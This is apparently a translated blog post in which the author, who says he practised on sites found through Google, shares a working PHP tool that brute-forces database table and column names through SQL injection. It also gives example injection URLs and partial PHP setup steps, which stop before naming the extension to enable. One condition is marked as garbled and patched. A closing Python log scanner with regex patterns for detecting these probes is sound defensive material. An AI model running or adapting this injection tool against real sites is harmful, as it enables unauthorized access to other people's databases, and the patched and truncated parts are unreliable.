Lately I've gotten hooked on scripting again, hehe~~~ I just finished learning PHP and then read some articles on PHP security, so I found a few sites through Google to practice on. It turned out that guessing table and column names by hand is really tedious. Do scanners like NBSI have any dictionary or brute-force mode for guessing table and column names? Do I really have to guess them one at a time? I'm lazy :-) Then it occurred to me: didn't I just finish learning PHP? Why not put it to use? PHP is not only a web scripting language, it is also a very good command-line interpreter, and writing scripts with it is convenient. To save myself some effort the next time I run into this kind of problem, I wrote a PHP script for guessing table and column names. The script is quite simple; its contents are as follows:

<?php
echo "Universal Database tables explode exploit V0.1\n";
echo "Written by Mika[EST]\n";
//$keyword="Warning";
$keyword="error";
switch($argc){
  case 3:
    $u=" and (select count(*) from MIKA_NAME)>0";
    $dic=$argv[2];
    break;
  case 4:
    $u=" and 1=1 union select ".implode(",",range(1,$argv[2]))." from MIKA_NAME#";
    $dic=$argv[3];
    break;
  case 5:
    if($argv[2]!="-t") exit("arguments Error");
    $u=" and (select count(MIKA_NAME) from $argv[3])>0#";
    $dic=$argv[4];
    break;
  case 6:
    // the second half of this condition is garbled in the original post;
    // a bare truthiness check on the column count stands in for it here
    if($argv[2]!="-t" || !$argv[4]) exit("arguments Error");
    if($argv[4]>=2){
      $u=" and 1=1 union select MIKA_NAME,".implode(",",range(2,$argv[4]))." from $argv[3]#";
    }else{
      $u=" and 1=1 union select MIKA_NAME from $argv[3]#";
    }
    $dic=$argv[5];
    break;
  default:
    echo <<<USAGE
Usage:$argv[0] [OPTIONS]
OPTIONS:
number --->to indicate column number of a table during a union query
Attention:if you dont use [options] the program will use default mode to work.you can change it in the source code of this program.
USAGE;
    die;
}
$old=$argv[1];
file_exists($dic) or exit("dic file does not exist!\n");
$words=file($dic);
$curl=curl_init();
curl_setopt($curl,CURLOPT_HEADER,0);
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_PROXY,"127.0.0.1:8080");
print "[+]Searching What you want...\n";
foreach($words as $word){
  //print $word;
  if(preg_match("/^\s*$/",$word)){ // skip blank lines in the dictionary
    //print "blank";
    continue;
  }
  // MIKA_NAME is a literal placeholder in $u, replaced with the current dictionary word
  $url=str_replace("MIKA_NAME",trim($word),$u);
  $url=$old.urlencode($url);
  //$url=$old.$url;
  curl_setopt($curl,CURLOPT_URL,$url);
  //print "source url is:".$url."\n";
  $content=curl_exec($curl);
  //$new=$content;
  //print $content;
  if(preg_match("/$keyword/i",$content)==0){
    print "[*] FOUND:".trim($word);
  }else{
    print ".";
  }
}
?>

Let me explain briefly. The module the program uses is curl, which is very convenient for fetching page contents. My PHP build is for Windows, so many modules are bundled with it, but curl is disabled by default and you need to enable it. The method is simple: download the latest portable PHP package (no installation needed, easy to carry around), copy php.ini-recommended from the archive into the system directory (winnt on Win2k, windows on XP and later), rename it to php.ini, open it in Notepad, and find the following line:

extension_dir =

Set its value to your own path. For example, if you extracted the archive to c:\php, you need to set it to:

extension_dir = "c:\php\ext"
Then continue on and find the following section:

; Windows Extensions
; Note that ODBC support is built in, so no dll is needed for it.
; Note that many DLL files are located in the extensions/ (PHP 4) ext/ (PHP 5)
; extension folders as well as the separate PECL DLL download (PHP 5).
; Be sure to appropriately set the extension_dir directive.

One thing to note: since this program was written for my own use, it doesn't take many things into account. It decides based on the content the page returns, so you first have to work that out manually yourself, for example like this:

http://www.aaa.com/bbb.asp?ccc=56 and (select count(*) from mika520)>0 (on Access and MSSQL)

or

http://www.aaa.com/bbb.asp?ccc=56 and 1=1 union select 1,2,3,4,5,6 from mika520%23 (on MySQL)
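From the defender's side, the two probe shapes this script sends (a boolean "and (select count(*) from X)>0" existence test and a "union select 1,2,... from X" column probe) are easy to pick out of web-server access logs. The Python below is an added example and not part of the original post: it URL-decodes the query string of each log line, flags both shapes, and groups hits by source IP. The log lines are constructed samples, not real traffic.

```python
import re
from urllib.parse import unquote_plus
from collections import defaultdict

# Constructed sample access-log lines (not from the original post); the
# query strings mirror the two probe shapes the script above generates.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2009:10:01:02 +0800] "GET /bbb.php?ccc=56 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2009:10:01:03 +0800] "GET /bbb.php?ccc=56+and+%28select+count%28%2A%29+from+admin%29%3E0 HTTP/1.1" 200 5120
10.0.0.9 - - [12/Mar/2009:10:01:04 +0800] "GET /bbb.php?ccc=56+and+%28select+count%28%2A%29+from+users%29%3E0 HTTP/1.1" 200 612
10.0.0.9 - - [12/Mar/2009:10:01:05 +0800] "GET /bbb.php?ccc=56+and+1%3D1+union+select+1%2C2%2C3+from+users%23 HTTP/1.1" 200 5120
10.0.0.7 - - [12/Mar/2009:10:01:06 +0800] "GET /search.php?q=union+station HTTP/1.1" 200 900
"""

# Common-log-format fields we need: client IP, request path, status, body size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+)')

# Probe shapes: existence test "and (select count(X) from Y)>0" and the
# union-based column/table probe "union select 1,2,3 from Y"
PROBE_PATTERNS = [
    ("count-probe", re.compile(
        r"\band\s*\(\s*select\s+count\s*\([^)]*\)\s+from\s+(\w+)\s*\)\s*>\s*0", re.I)),
    ("union-probe", re.compile(
        r"\bunion\s+select\s+[\w\s,]+\s+from\s+(\w+)", re.I)),
]

def classify_request(path):
    """Return (probe_kind, table_name) when the decoded query string matches
    one of the probe shapes, otherwise None."""
    if "?" not in path:
        return None
    query = unquote_plus(path.split("?", 1)[1])  # undo urlencode(): '+' and %XX
    for kind, pattern in PROBE_PATTERNS:
        m = pattern.search(query)
        if m:
            return kind, m.group(1)
    return None

def scan_log(text):
    """Group flagged probes by source IP: {ip: [(kind, table, status, size), ...]}."""
    hits = defaultdict(list)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        result = classify_request(m.group("path"))
        if result:
            hits[m.group("ip")].append(
                (result[0], result[1], int(m.group("status")), int(m.group("size"))))
    return dict(hits)
```

A run of near-identical requests from one IP where only the table name changes, combined with the response size differing between guesses that error out and guesses that do not, is the signature of this kind of dictionary sweep.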